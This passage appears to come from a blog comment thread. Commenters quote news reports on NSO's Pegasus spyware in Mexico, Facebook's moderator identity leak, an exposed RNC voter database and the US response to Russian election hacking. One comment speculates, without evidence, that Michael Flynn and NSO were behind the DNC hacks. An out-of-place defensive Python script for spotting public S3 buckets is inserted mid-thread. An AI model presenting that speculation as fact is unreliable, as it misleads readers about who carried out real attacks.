    Now, in terms of assessing the significance of these business relationships, on the one hand, cybersecurity is one of the areas one should expect the former head of the US Defense Intelligence Agency to go into after leaving government. On the other hand, we just witnessed the most hack-intensive US campaign in history and all the hacking was done in favor of Donald Trump. So, you know, some suspicions that maybe, just maybe, one of the private elite hacking firms Flynn worked for has something to do with these hacks.

    It’s important to note that, in terms of the timing, both the DNC server hacks and John Podesta’s email hack were already carried out by the time Flynn joined OSY in May (the same month the hacks were ended for both the DNC and Podesta emails), so it’s not like Flynn joined OSY and then the hacking started (not that Flynn wouldn’t have likely been in contact with them well before May). Still, due to the relative lack of sophistication required to carry out a spear-phishing attack – the method behind both the DNC server hack and Podesta’s emails and, allegedly, the attempts to hack 39 state election systems a week before the election – it really is the case that almost anyone could have pulled these hacks off if they had adequate hacking skills and wanted to hide their tracks and make it look like ‘the Russians’ did it. And the NSO Group’s software specializes in creating spear-phishing campaigns designed to trick people into clicking on the bad links using a variety of different tricks and inserting spying malware in the victims’ systems:

    The New York Times

    Using Texts as Lures, Government Spyware Targets Mexican Journalists and Their Families

    By AZAM AHMED and NICOLE PERLROTH
    JUNE 19, 2017

    MEXICO CITY — Mexico’s most prominent human rights lawyers, journalists and anti-corruption activists have been targeted by advanced spyware sold to the Mexican government on the condition that it be used only to investigate criminals and terrorists.

    The targets include lawyers looking into the mass disappearance of 43 students, a highly respected academic who helped write anti-corruption legislation, two of Mexico’s most influential journalists and an American representing victims of sexual abuse by the police. The spying even swept up family members, including a teenage boy.

    Since 2011, at least three Mexican federal agencies have purchased about $80 million worth of spyware created by an Israeli cyberarms manufacturer. The software, known as Pegasus, infiltrates smartphones to monitor every detail of a person’s cellular life — calls, texts, email, contacts and calendars. It can even use the microphone and camera on phones for surveillance, turning a target’s smartphone into a personal bug.

    The company that makes the software, the NSO Group, says it sells the tool exclusively to governments, with an explicit agreement that it be used only to battle terrorists or the drug cartels and criminal groups that have long kidnapped and killed Mexicans.

    But according to dozens of messages examined by The New York Times and independent forensic analysts, the software has been used against some of the government’s most outspoken critics and their families, in what many view as an unprecedented effort to thwart the fight against the corruption infecting every limb of Mexican society.

    “We are the new enemies of the state,” said Juan E. Pardinas, the general director of the Mexican Institute for Competitiveness, who has pushed anti-corruption legislation. His iPhone, along with his wife’s, was targeted by the software, according to an independent analysis. “Ours is a society where democracy has been eroded,” he said.

    The deployment of sophisticated cyberweaponry against citizens is a snapshot of the struggle for Mexico itself, raising profound legal and ethical questions for a government already facing severe criticism for its human rights record. Under Mexican law, only a federal judge can authorize the surveillance of private communications, and only when officials can demonstrate a sound basis for the request.

    It is highly unlikely that the government received judicial approval to hack the phones, according to several former Mexican intelligence officials. Instead, they said, illegal surveillance is standard practice.

    “Mexican security agencies wouldn’t ask for a court order, because they know they wouldn’t get one,” said Eduardo Guerrero, a former analyst at the Center for Investigation and National Security, Mexico’s intelligence agency and one of the government agencies that use the Pegasus spyware. “I mean, how could a judge authorize surveillance of someone dedicated to the protection of human rights?”

    “There, of course, is no basis for that intervention, but that is beside the point,” he added. “No one in Mexico ever asks for permission to do so.”

    The hacking attempts were highly personalized, striking critics with messages designed to inspire fear — and get them to click on a link that would provide unfettered access to their cellphones.

    Carmen Aristegui, one of Mexico’s most famous journalists, was targeted by a spyware operator posing as the United States Embassy in Mexico, instructing her to click on a link to resolve an issue with her visa. The wife of Mr. Pardinas, the anti-corruption activist, was targeted with a message claiming to offer proof that he was having an extramarital affair.

    For others, imminent danger was the entry point, like a message warning that a truck filled with armed men was parked outside Mr. Pardinas’s home.

    “I think that any company that sells a product like this to a government would be horrified by the targets, of course, which don’t seem to fall into the traditional role of criminality,” said John Scott-Railton, a senior researcher at Citizen Lab at the Munk School of Global Affairs at the University of Toronto, which examined the hacking attempts.

    The Mexican government acknowledges gathering intelligence against legitimate suspects in accordance with the law. “As in any democratic government, to combat crime and threats against national security the Mexican government carries out intelligence operations,” it said in a statement.

    But the government “categorically denies that any of its members engages in surveillance or communications operations against defenders of human rights, journalists, anti-corruption activists or any other person without prior judicial authorization.”

    The Mexican government’s deployment of spyware has come under suspicion before, including hacking attempts on political opponents and activists fighting corporate interests in Mexico.

    Still, there is no ironclad proof that the Mexican government is responsible. The Pegasus software does not leave behind the hacker’s individual fingerprints. Even the software maker, the NSO Group, says it cannot determine who, exactly, is behind specific hacking attempts.

    But cyberexperts can verify when the software has been used on a target’s phone, leaving them with few doubts that the Mexican government, or some rogue actor within it, was involved.

    “This is pretty much as good as it gets,” said Bill Marczak, another senior researcher at Citizen Lab, who confirmed the presence of NSO code on several phones belonging to Mexican journalists and activists.

    Moreover, it is extremely unlikely that cybercriminals somehow got their hands on the software, the NSO Group says, because the technology can be used only by the government agency where it is installed.

    The company is part of a growing number of digital spying businesses that operate in a loosely regulated space. The market has picked up in recent years, particularly as companies like Apple and Facebook start encrypting their customers’ communications, making it harder for government agencies to conduct surveillance.

    Increasingly, governments have found that the only way to monitor mobile phones is by using private businesses like the NSO Group that exploit little-known vulnerabilities in smartphone software. The company has, at times, operated its businesses under different names. One of them, OSY Technologies, paid Michael T. Flynn, President Trump’s former national security adviser, more than $40,000 to be an advisory board member from May 2016 until January, according to his public financial disclosures.

    Before selling to governments, the NSO Group says, it vets their human rights records. But once the company licenses the software and installs its hardware inside intelligence and law enforcement agencies, the company says, it has no way of knowing how its spy tools are used — or whom they are used against.

    The company simply bills governments based on the total number of surveillance targets. To spy on 10 iPhone users, for example, the company charges $650,000 on top of a flat $500,000 installation fee, according to NSO marketing proposals reviewed by The New York Times.

    Even when the NSO Group learns that its software has been abused, there is only so much it can do, the company says, arguing that it cannot simply march into intelligence agencies, remove its hardware and take back its spyware.

    “When you’re selling AK-47s, you can’t control how they’ll be used once they leave the loading docks,” said Kevin Mahaffey, chief technology officer at Lookout, a mobile security company.

    Rather, the NSO Group relies on its customers to cooperate in a review, then turns over the findings to the appropriate governmental authority — in effect, leaving governments to police themselves.

    Typically, the company’s only recourse is to slowly cut off a government’s access to the spy tools over the course of months, or even years, by ceasing to provide new software patches, features and updates. But in the case of Mexico, the NSO Group has not condemned or even acknowledged any abuse, despite repeated evidence that its spy tools have been deployed against ordinary citizens and their families.

    ———-

    “Using Texts as Lures, Government Spyware Targets Mexican Journalists and Their Families” by AZAM AHMED and NICOLE PERLROTH; The New York Times; 06/19/2017

    “Increasingly, governments have found that the only way to monitor mobile phones is by using private businesses like the NSO Group that exploit little-known vulnerabilities in smartphone software. The company has, at times, operated its businesses under different names. One of them, OSY Technologies, paid Michael T. Flynn, President Trump’s former national security adviser, more than $40,000 to be an advisory board member from May 2016 until January, according to his public financial disclosures.”

    And note how even when a phone is known to be hacked by someone using the NSO Group malware after a successful spear-phishing attempt, there’s still no way to know which NSO Group client did it. Even NSO Group claims it can’t determine who did it:


    The Mexican government’s deployment of spyware has come under suspicion before, including hacking attempts on political opponents and activists fighting corporate interests in Mexico.

    Still, there is no ironclad proof that the Mexican government is responsible. The Pegasus software does not leave behind the hacker’s individual fingerprints. Even the software maker, the NSO Group, says it cannot determine who, exactly, is behind specific hacking attempts.

    But cyberexperts can verify when the software has been used on a target’s phone, leaving them with few doubts that the Mexican government, or some rogue actor within it, was involved.

    “This is pretty much as good as it gets,” said Bill Marczak, another senior researcher at Citizen Lab, who confirmed the presence of NSO code on several phones belonging to Mexican journalists and activists.

    Moreover, it is extremely unlikely that cybercriminals somehow got their hands on the software, the NSO Group says, because the technology can be used only by the government agency where it is installed.

    “This is pretty much as good as it gets,” said Bill Marczak, another senior researcher at Citizen Lab, who confirmed the presence of NSO code on several phones belonging to Mexican journalists and activists.”

    Yes, “this” is pretty much as good as it gets in terms of establishing evidence of who was behind a hack of this nature, where “this” is “circumstantial evidence”. And that circumstantial evidence is pretty good if you’re talking about a Mexican dissident with malware traced back to the NSO Group on their phone. Sure, maybe some other NSO Group client did the hack in that circumstance, but it’s a pretty good bet it was the Mexican government in such a circumstance simply due to a lack of other NSO Group clients who would care about a Mexican dissident.

    And yet for the DNC/Podesta hacks, which were also spear-phishing campaigns but against targets with a wide variety of potential enemies across the globe, the primary evidence we’re given that the Russian government was really behind the hacks was the amazingly sloppy hacker ‘mistakes’ like Cyrillic characters in the hacked document meta-data and leaving the Bitly accounts they were using to create the links used in the spear-phishing emails public so cyber-security researchers could watch their entire hacking campaign list of targets. In other words, ‘evidence’ that could have easily been left to be found.

    So that all adds to the mystery of Michael Flynn and the potential role he played in the Trump campaign. The former head of the US military’s spy agency worked for a company that makes advanced software designed to first conduct a successful spear-phishing campaign and then give the victim NSO Group’s special spying malware, the same kind of campaign that attacked the DNC, John Podesta, and the 39 state election systems. And yet almost no one seems to raise the question as to whether or not Flynn and his deep ties to the hacking world could have had anything to do with those high-profile hacks. Only consideration of Russian hackers is allowed. It’s a pretty mysterious mystery, although perhaps not as mysterious as the investigation.

    Posted by Pterrafractyl | June 21, 2017, 2:55 pm
  8. https://www.theguardian.com/technology/2017/jun/16/facebook-moderators-identity-exposed-terrorist-groups#img-2

    Revealed: Facebook exposed identities of moderators to suspected terrorists

    A security lapse that affected more than 1,000 workers forced one moderator into hiding – and he still lives in constant fear for his safety

    Olivia Solon in San Francisco

    Friday 16 June 2017 03.09 EDT
    First published on Friday 16 June 2017 03.00 EDT

    Facebook put the safety of its content moderators at risk after inadvertently exposing their personal details to suspected terrorist users of the social network, the Guardian has learned.

    The security lapse affected more than 1,000 workers across 22 departments at Facebook who used the company’s moderation software to review and remove inappropriate content from the platform, including sexual material, hate speech and terrorist propaganda.

    A bug in the software, discovered late last year, resulted in the personal profiles of content moderators automatically appearing as notifications in the activity log of the Facebook groups, whose administrators were removed from the platform for breaching the terms of service. The personal details of Facebook moderators were then viewable to the remaining admins of the group.

    Of the 1,000 affected workers, around 40 worked in a counter-terrorism unit based at Facebook’s European headquarters in Dublin, Ireland. Six of those were assessed to be “high priority” victims of the mistake after Facebook concluded their personal profiles were likely viewed by potential terrorists.

    The Guardian spoke to one of the six, who did not wish to be named out of concern for his and his family’s safety. The Iraqi-born Irish citizen, who is in his early twenties, fled Ireland and went into hiding after discovering that seven individuals associated with a suspected terrorist group he banned from Facebook – an Egypt-based group that backed Hamas and, he said, had members who were Islamic State sympathizers – had viewed his personal profile.

    Facebook confirmed the security breach in a statement and said it had made technical changes to “better detect and prevent these types of issues from occurring”.

    “We care deeply about keeping everyone who works for Facebook safe,” a spokesman said. “As soon as we learned about the issue, we fixed it and began a thorough investigation to learn as much as possible about what happened.”

    The moderator who went into hiding was among hundreds of “community operations analysts” contracted by global outsourcing company Cpl Recruitment. Community operations analysts are typically low-paid contractors tasked with policing Facebook for content that breaches its community standards.

    Overwhelmed with fear that he could face retaliation, the moderator, who first came to Ireland as an asylum seeker when he was a child, quit his job and moved to eastern Europe for five months.

    “It was getting too dangerous to stay in Dublin,” he said, explaining that his family had already experienced the horrifying impact of terrorism: his father had been kidnapped and beaten and his uncle executed in Iraq.

    “The only reason we’re in Ireland was to escape terrorism and threats,” he said.

    The moderator said that others within the high-risk six had their personal profiles viewed by accounts with ties to Isis, Hezbollah and the Kurdistan Workers Party. Facebook complies with the US state department’s designation of terrorist groups.

    “When you come from a war zone and you have people like that knowing your family name you know that people get butchered for that,” he said. “The punishment from Isis for working in counter-terrorism is beheading. All they’d need to do is tell someone who is radical here.”

    Facebook moderators like him first suspected there was a problem when they started receiving friend requests from people affiliated with the terrorist organizations they were scrutinizing.

    An urgent investigation by Facebook’s security team established that personal profiles belonging to content moderators had been exposed. As soon as the leak was identified in November 2016, Facebook convened a “task force of data scientists, community operations and security investigators”, according to internal emails seen by the Guardian, and warned all the employees and contracted staff it believed were affected. The company also set up an email address, nameleak@fb.com, to field queries from those affected.

    Facebook then discovered that the personal Facebook profiles of its moderators had been automatically appearing in the activity logs of the groups they were shutting down.

    Craig D’Souza, Facebook’s head of global investigations, liaised directly with some of the affected contractors, talking to the six individuals considered to be at the highest risk over video conference, email and Facebook Messenger.

    In one exchange, before the Facebook investigation was complete, D’Souza sought to reassure the moderators that there was “a good chance” any suspected terrorists notified about their identity would fail to connect the dots.

    “Keep in mind that when the person sees your name on the list, it was in their activity log, which contains a lot of information,” D’Souza wrote, “there is a good chance that they associate you with another admin of the group or a hacker …”

    “I understand Craig,” replied the moderator who ended up fleeing Ireland, “but this is taking chances. I’m not waiting for a pipe bomb to be mailed to my address until Facebook does something about it.”

    The bug in the software was not fixed for another two weeks, on 16 November 2016. By that point the glitch had been active for a month. However, the bug was also retroactively exposing the personal profiles of moderators who had censored accounts as far back as August 2016.

    Facebook offered to install a home alarm monitoring system and provide transport to and from work to those in the high risk group. The company also offered counseling through Facebook’s employee assistance program, over and above counseling offered by the contractor, Cpl.

    The moderator who fled Ireland was unsatisfied with the security assurances received from Facebook. In an email to D’Souza, he wrote that the high-risk six had spent weeks “in a state of panic and emergency” and that Facebook needed to do more to “address our pressing concerns for our safety and our families”.

    He told the Guardian that the five months he spent in eastern Europe felt like “exile”. He kept a low profile, relying on savings to support himself. He spent his time keeping fit and liaising with his lawyer and the Dublin police, who checked up on his family while he was away. He returned to Ireland last month after running out of money, although he still lives in fear.

    “I don’t have a job, I have anxiety and I’m on antidepressants,” he said. “I can’t walk anywhere without looking back.”

    This month he filed a legal claim against Facebook and Cpl with the Injuries Board in Dublin. He is seeking compensation for the psychological damage caused by the leak.

    Cpl did not respond to a request to comment. The statement provided by Facebook said its investigation sought to determine “exactly which names were possibly viewed and by whom, as well as an assessment of the risk to the affected person”.

    The social media giant played down the threat posed to the affected moderators, but said that it contacted each of them individually “to offer support, answer their questions, and take meaningful steps to ensure their safety”.

    “Our investigation found that only a small fraction of the names were likely viewed, and we never had evidence of any threat to the people impacted or their families as a result of this matter,” the spokesman said.

    Details of Facebook’s security blunder will once again put a spotlight on the grueling and controversial work carried out by an army of thousands of low-paid staff, including in countries like the Philippines and India.

    The Guardian recently revealed the secret rules and guidelines Facebook uses to train moderators to police its vast network of almost two billion users, including 100 internal training manuals, spreadsheets and flowcharts.

    The moderator who fled Ireland worked for a 40-strong specialist team tasked with investigating reports of terrorist activity on Facebook. He was hired because he spoke Arabic, he said.

    He felt that contracted staff were not treated as equals to Facebook employees but “second-class citizens”. He was paid just €13 ($15) per hour for a role that required him to develop specialist knowledge of global terror networks and scour through often highly-disturbing material.

    “You come in every morning and just look at beheadings, people getting butchered, stoned, executed,” he said.

    Facebook’s policies allow users to post extremely violent images provided they don’t promote or celebrate terrorism. This means moderators may be repeatedly exposed to the same haunting pictures to determine whether the people sharing them were condemning or celebrating the depicted acts.

    The moderator said that when he started, he was given just two weeks training and was required to use his personal Facebook account to log into the social media giant’s moderation system.

    “They should have let us use fake profiles,” he said, adding: “They never warned us that something like this could happen.”

    Facebook told the Guardian that as a result of the leak it is testing the use of administrative accounts that are not linked to personal profiles.

    Moderation teams were continually scored for the accuracy and speed of their decisions, he said, as well as other factors such as their ability to stay updated on training materials. If a moderator’s score dropped below 90% they would receive a formal warning.

    In an attempt to boost morale among agency staff, Facebook launched a monthly award ceremony to celebrate the top quality performers. The prize was a Facebook-branded mug. “The mug that all Facebook employees get,” he noted.

    Contact the author: olivia.solon@theguardian.com

    Posted by Michelle Zucker | June 21, 2017, 6:52 pm
  9. This article from “The Hill” expresses concern because an RNC database was not secure in an Amazon cloud server. The question not asked is why the RNC needs files of information addressing 46 issues for nearly 200 million Americans. The most important paragraphs from the article are these three:

    1. For example, a 50-gigabyte file of “Post Elect 2016” information, last updated in mid-January, contained modeled data about a voter’s likely positions on 46 different issues ranging from “how likely it is the individual voted for Obama in 2012, whether they agree with the Trump foreign policy of ‘America First’ and how likely they are to be concerned with auto manufacturing as an issue, among others.”
    2. According to Ad Age, the RNC spent $983,000 between January 2015 and November 2016 for Deep Root’s services and $4.2 million for TargetPoint’s.
    3. The Deep Root Analytics exposure contains information on more than half of the American population.

    http://thehill.com/policy/cybersecurity/338383-data-on-198-million-us-voters-left-exposed-to-the-internet-by-rnc-data

    Data on 198M voters exposed by GOP contractor
    BY JOE UCHILL – 06/19/17 09:00 AM EDT
    A data analytics contractor employed by the Republican National Committee (RNC) left databases containing information on nearly 200 million potential voters exposed to the internet without security, allowing anyone who knew where to look to download it without a password. 

    “We take full responsibility for this situation,” said the contractor, Deep Root Analytics, in a statement.  

    The databases were part of 25 terabytes of files contained in an Amazon cloud account that could be browsed without logging in. The account was discovered by researcher Chris Vickery of the security firm UpGuard. The files have since been secured. 

    Vickery is a prominent researcher in uncovering improperly secured files online. But, he said, this exposure is of a magnitude he has never seen before.

    “In terms of the disc space used, this is the biggest exposure I’ve found. In terms of the scope and depth, this is the biggest one I’ve found,” said Vickery.

    The accessible files, according to UpGuard, contain a main 198 million-entry database with names, addresses of voters and an “RNC ID” that can be used with other exposed files to research individuals.

    For example, a 50-gigabyte file of “Post Elect 2016” information, last updated in mid-January, contained modeled data about a voter’s likely positions on 46 different issues ranging from “how likely it is the individual voted for Obama in 2012, whether they agree with the Trump foreign policy of ‘America First’ and how likely they are to be concerned with auto manufacturing as an issue, among others.”

    That file appears in a folder titled “target_point,” an apparent reference to another firm contracted by the RNC to crunch data. UpGuard speculates that the folder may imply that the firm TargetPoint compiled and shared the data with Deep Root. Another folder appears to reference Data Trust, another contracted firm. 

    UpGuard analyst Dan O’Sullivan looked himself up in the database and writes in the official report that the calculated preferences were, at least for him, right on the money. 

    “It is a testament both to their talents, and to the real danger of this exposure, that the results were astoundingly accurate,” he said. 

    The Deep Root Analytics cloud server had 25 terabytes of data exposed, including 1.1 terabytes available for download. 

    Over the 2016 election season, the RNC was a major client of Deep Root, one of a handful of firms it contracted for big data analysis. Firms like Deep Root Analytics use data from a variety of sources to extrapolate social and political preferences of voters to determine how best to market to them. 

    According to Ad Age, the RNC spent $983,000 between January 2015 and November 2016 for Deep Root’s services and $4.2 million for TargetPoint’s. 

    “Deep Root Analytics builds voter models to help enhance advertiser understanding of TV viewership. The data accessed was not built for or used by any specific client. It is our proprietary analysis to help inform local television ad buying,” said Deep Root Analytics in their statement. 

    Misconfigured cloud servers and online databases are a common way for data to be accidentally left exposed to the public. Vickery has found everything from military engineering plans to databases of believed terrorists in exactly this way.

    What is uncommon in this case is the size and scope of this exposure. If its records are accurate, the Deep Root Analytics exposure contains information on more than half of the American population. It dwarfs the second-largest exposure of voter information — 93.4 million records of Mexican citizens — by more than 100 million voters and tops the largest data breach of voter information — 55 million records of Philippine voters — by more than 140 million. 

    Anyone who knew the files’ web address could have accessed them. But without that knowledge, they are much harder to find. Even armed with a search for unsecured databases, finding exposures of any magnitude is tough work. Vickery sifts through a large number of unsecured databases to find ones that are interesting enough to publish research on.

    Deep Root has contracted the security firm Stroz Friedberg to perform a thorough investigation of the exposure.

    The exposure, between June 1 and June 14, was sealed shut shortly after Vickery made the discovery during the night of June 12 and notified relevant regulatory bodies. 

    Posted by Michelle Zucker | June 21, 2017, 7:00 pm
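    The exposure described above came down to storage that could be read without logging in. As an added example (not code from The Hill, UpGuard or Deep Root), the script below shows the check a cloud defender would run over a bucket’s own configuration: it evaluates a bucket ACL, a bucket policy and the account’s Public Access Block settings in the shapes the AWS S3 API returns them, and reports whether anonymous read or list access is in effect. It runs offline; all bucket names, IDs and documents in it are constructed samples, not Deep Root’s.

```python
"""Offline check for publicly readable S3 bucket configuration.

Added example. Inputs mirror the documents returned by GetBucketAcl,
GetBucketPolicy and GetPublicAccessBlock; all sample data is constructed.
"""
import json

# The two ACL grantee groups that mean "anyone on the internet" and
# "anyone with any AWS account" respectively.
PUBLIC_ACL_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}
# Policy actions that let a caller list the bucket or fetch its objects.
READ_LIKE_ACTIONS = {"s3:getobject", "s3:listbucket", "s3:get*", "s3:list*", "s3:*", "*"}


def _as_list(value):
    """Policy fields may be a string or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def acl_public_grants(acl):
    """Permissions a GetBucketAcl document grants to the global groups."""
    found = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_ACL_GROUPS:
            found.append((grantee["URI"].rsplit("/", 1)[-1], grant.get("Permission")))
    return found


def _principal_is_anyone(principal):
    """True for Principal "*" or {"AWS": "*"} (anonymous access)."""
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS", []))


def policy_public_statements(policy):
    """Allow statements addressed to everyone, split into unconditional and conditional.

    A Condition (e.g. aws:SourceVpce) may narrow access, so those statements are
    reported for review rather than flagged as open.
    """
    public, conditional = [], []
    for i, st in enumerate(_as_list(policy.get("Statement", []))):
        if st.get("Effect") != "Allow" or not _principal_is_anyone(st.get("Principal")):
            continue
        actions = {a.lower() for a in _as_list(st.get("Action", []))}
        if not actions & READ_LIKE_ACTIONS:
            continue
        label = st.get("Sid") or f"Statement[{i}]"
        (conditional if st.get("Condition") else public).append(label)
    return public, conditional


def assess_bucket(acl, policy, public_access_block):
    """Combine ACL, policy and Public Access Block into one verdict.

    IgnorePublicAcls makes S3 ignore public ACL grants; RestrictPublicBuckets
    neutralises public bucket policies. Either flag defeats the matching route.
    """
    pab = public_access_block or {}
    reasons = []
    acl_grants = acl_public_grants(acl)
    if acl_grants and not pab.get("IgnorePublicAcls", False):
        reasons.append(f"ACL grants to public groups: {acl_grants}")
    public, conditional = policy_public_statements(policy or {})
    if public and not pab.get("RestrictPublicBuckets", False):
        reasons.append(f"policy statements open to anyone: {public}")
    review = [f"conditional public statement, check its Condition: {s}" for s in conditional]
    return {"public": bool(reasons), "reasons": reasons, "review": review}


# ---- constructed sample documents (not real buckets or accounts) ----
OWNER = {"Type": "CanonicalUser", "ID": "example-owner-canonical-id"}
PRIVATE_ACL = {"Owner": {"ID": OWNER["ID"]},
               "Grants": [{"Grantee": OWNER, "Permission": "FULL_CONTROL"}]}
EXPOSED_ACL = {"Owner": {"ID": OWNER["ID"]}, "Grants": PRIVATE_ACL["Grants"] + [
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
     "Permission": "READ"}]}
OPEN_POLICY = json.loads("""{"Version": "2012-10-17", "Statement": [{"Sid": "PublicRead",
  "Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
  "Resource": "arn:aws:s3:::example-bucket/*"}]}""")
VPCE_POLICY = json.loads("""{"Version": "2012-10-17", "Statement": [{"Sid": "VpceOnly",
  "Effect": "Allow", "Principal": "*", "Action": ["s3:GetObject", "s3:ListBucket"],
  "Resource": ["arn:aws:s3:::example-bucket", "arn:aws:s3:::example-bucket/*"],
  "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-example"}}}]}""")
HARDENED_PAB = {"BlockPublicAcls": True, "IgnorePublicAcls": True,
                "BlockPublicPolicy": True, "RestrictPublicBuckets": True}

if __name__ == "__main__":
    for name, args in {"exposed-acl": (EXPOSED_ACL, None, None),
                       "exposed-acl+pab": (EXPOSED_ACL, None, HARDENED_PAB),
                       "open-policy": (PRIVATE_ACL, OPEN_POLICY, None),
                       "vpce-policy": (PRIVATE_ACL, VPCE_POLICY, None)}.items():
        print(name, assess_bucket(*args))
```

    In practice the three documents come from `get_bucket_acl`, `get_bucket_policy` and `get_public_access_block` (a missing policy or Public Access Block is passed as `None`); the point of folding the Public Access Block in is that an ACL grant to AllUsers like the one in `EXPOSED_ACL` is harmless once `IgnorePublicAcls` is set, and the check should say so rather than raise a false alarm.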
  10. @Michelle Zucker–

    Pterrafractyl contributed this information, plus some additional, edifying points that you might want to peruse.

    Best,

    Dave

    Posted by Dave Emory | June 21, 2017, 7:42 pm
  11. The Washington Post has a big new piece on the US’s investigation into the 2016 election hacks that contains a number of interesting revelations, both in terms of how the US government came to the . And overall, perhaps the biggest revelation is how little the technical evidence of the hack had to do with the final conclusion that the Russian government was behind the attacks. Instead, it sounds like that conclusion was based on a CIA source in the Kremlin. And even when that intelligence was delivered, other agencies weren’t ready to accept the CIA’s conclusion, and it took intelligence from another nation (not named) to provide the final intelligence tipping point that led to a broad-based conclusion that not only was the Russian government behind the cyberattacks but that Vladimir Putin himself ordered it. And that ally’s intelligence is described as “the most critical technical intelligence on Russia,” and the NSA still wasn’t convinced, based on what sounds like a lack of confidence in that source. So it looks like a CIA Kremlin source and an unnamed foreign intelligence agency with questionable credentials are the basis of what appears to be a likely future full-scale US/Russian cyberwar.

    Beyond that, the piece describes the fears of those top US officials examining this issue over the summer of 2016, and it sounds like many were concerned that the DNC hacks really were just a warm-up to a much broader full-scale cyberwar against the US election that would have included hacking the election systems and disrupting the vote. So that gives us a sense of the mindset (or at least projected mindset) of top government officials: at least some were convinced that Putin was so pissed off at the prospect of Hillary Clinton becoming President that he was willing to launch a cyberwar. A cyberwar that would undoubtedly provoke a serious response and obviously be very difficult to contain.

    Finally, the piece ends with a description of what appears to be the most significant US response to the alleged Russian government role in the hacks: the US has already planted a number of ‘cyberbombs’ on Russian networks intended to be very painful if used and capable of being remotely triggered in response to a future Russian cyberattack. It could be an attack on the US electrical grid or a future election. But those ‘cyberbombs’ are apparently being put in place now and the order has been given to trigger them in the future without a presidential order. Unless Donald Trump rescinds that order.

    So based on a CIA Kremlin source and the intelligence from a mystery ally the US is openly planting retaliatory cyberbombs on Russian networks. What could possibly go wrong:

    The Washington Post

    Obama’s secret struggle to punish Russia for Putin’s election assault

    By Greg Miller, Ellen Nakashima and Adam Entous
    June 23, 2017

    Early last August, an envelope with extraordinary handling restrictions arrived at the White House. Sent by courier from the CIA, it carried “eyes only” instructions that its contents be shown to just four people: President Barack Obama and three senior aides.

    Inside was an intelligence bombshell, a report drawn from sourcing deep inside the Russian government that detailed Russian President Vladimir Putin’s direct involvement in a cyber campaign to disrupt and discredit the U.S. presidential race.

    But it went further. The intelligence captured Putin’s specific instructions on the operation’s audacious objectives — defeat or at least damage the Democratic nominee, Hillary Clinton, and help elect her opponent, Donald Trump.

    At that point, the outlines of the Russian assault on the U.S. election were increasingly apparent. Hackers with ties to Russian intelligence services had been rummaging through Democratic Party computer networks, as well as some Republican systems, for more than a year. In July, the FBI had opened an investigation of contacts between Russian officials and Trump associates. And on July 22, nearly 20,000 emails stolen from the Democratic National Committee were dumped online by WikiLeaks.

    But at the highest levels of government, among those responsible for managing the crisis, the first moment of true foreboding about Russia’s intentions arrived with that CIA intelligence.

    The material was so sensitive that CIA Director John Brennan kept it out of the President’s Daily Brief, concerned that even that restricted report’s distribution was too broad. The CIA package came with instructions that it be returned immediately after it was read. To guard against leaks, subsequent meetings in the Situation Room followed the same protocols as planning sessions for the Osama bin Laden raid.

    It took time for other parts of the intelligence community to endorse the CIA’s view. Only in the administration’s final weeks in office did it tell the public, in a declassified report, what officials had learned from Brennan in August — that Putin was working to elect Trump.

    Over that five-month interval, the Obama administration secretly debated dozens of options for deterring or punishing Russia, including cyberattacks on Russian infrastructure, the release of CIA-gathered material that might embarrass Putin and sanctions that officials said could “crater” the Russian economy.

    But in the end, in late December, Obama approved a modest package combining measures that had been drawn up to punish Russia for other issues — expulsions of 35 diplomats and the closure of two Russian compounds — with economic sanctions so narrowly targeted that even those who helped design them describe their impact as largely symbolic.

    Obama also approved a previously undisclosed covert measure that authorized planting cyber weapons in Russia’s infrastructure, the digital equivalent of bombs that could be detonated if the United States found itself in an escalating exchange with Moscow. The project, which Obama approved in a covert-action finding, was still in its planning stages when Obama left office. It would be up to President Trump to decide whether to use the capability.

    In political terms, Russia’s interference was the crime of the century, an unprecedented and largely successful destabilizing attack on American democracy. It was a case that took almost no time to solve, traced to the Kremlin through cyber-forensics and intelligence on Putin’s involvement. And yet, because of the divergent ways Obama and Trump have handled the matter, Moscow appears unlikely to face proportionate consequences.

    Those closest to Obama defend the administration’s response to Russia’s meddling. They note that by August it was too late to prevent the transfer to WikiLeaks and other groups of the troves of emails that would spill out in the ensuing months. They believe that a series of warnings — including one that Obama delivered to Putin in September — prompted Moscow to abandon any plans of further aggression, such as sabotage of U.S. voting systems.

    Denis McDonough, who served as Obama’s chief of staff, said that the administration regarded Russia’s interference as an attack on the “heart of our system.”

    “We set out from a first-order principle that required us to defend the integrity of the vote,” McDonough said in an interview. “Importantly, we did that. It’s also important to establish what happened and what they attempted to do so as to ensure that we take the steps necessary to stop it from happening again.”

    But other administration officials look back on the Russia period with remorse.

    “It is the hardest thing about my entire time in government to defend,” said a former senior Obama administration official involved in White House deliberations on Russia. “I feel like we sort of choked.”

    This account of the Obama administration’s response to Russia’s interference is based on interviews with more than three dozen current and former U.S. officials in senior positions in government, including at the White House, the State, Defense and Homeland Security departments, and U.S. intelligence services. Most agreed to speak only on the condition of anonymity, citing the sensitivity of the issue.

    The White House, the CIA, the FBI, the National Security Agency and the Office of the Director of National Intelligence declined to comment.

    ‘Deeply concerned’

    The CIA breakthrough came at a stage of the presidential campaign when Trump had secured the GOP nomination but was still regarded as a distant long shot. Clinton held comfortable leads in major polls, and Obama expected that he would be transferring power to someone who had served in his Cabinet.

    The intelligence on Putin was extraordinary on multiple levels, including as a feat of espionage.

    For spy agencies, gaining insights into the intentions of foreign leaders is among the highest priorities. But Putin is a remarkably elusive target. A former KGB officer, he takes extreme precautions to guard against surveillance, rarely communicating by phone or computer, always running sensitive state business from deep within the confines of the Kremlin.

    The Washington Post is withholding some details of the intelligence at the request of the U.S. government.

    In early August, Brennan alerted senior White House officials to the Putin intelligence, making a call to deputy national security adviser Avril Haines and pulling national security adviser Susan E. Rice aside after a meeting before briefing Obama along with Rice, Haines and McDonough in the Oval Office.

    Officials described the president’s reaction as grave. Obama “was deeply concerned and wanted as much information as fast as possible,” a former official said. “He wanted the entire intelligence community all over this.”

    Concerns about Russian interference had gathered throughout the summer.

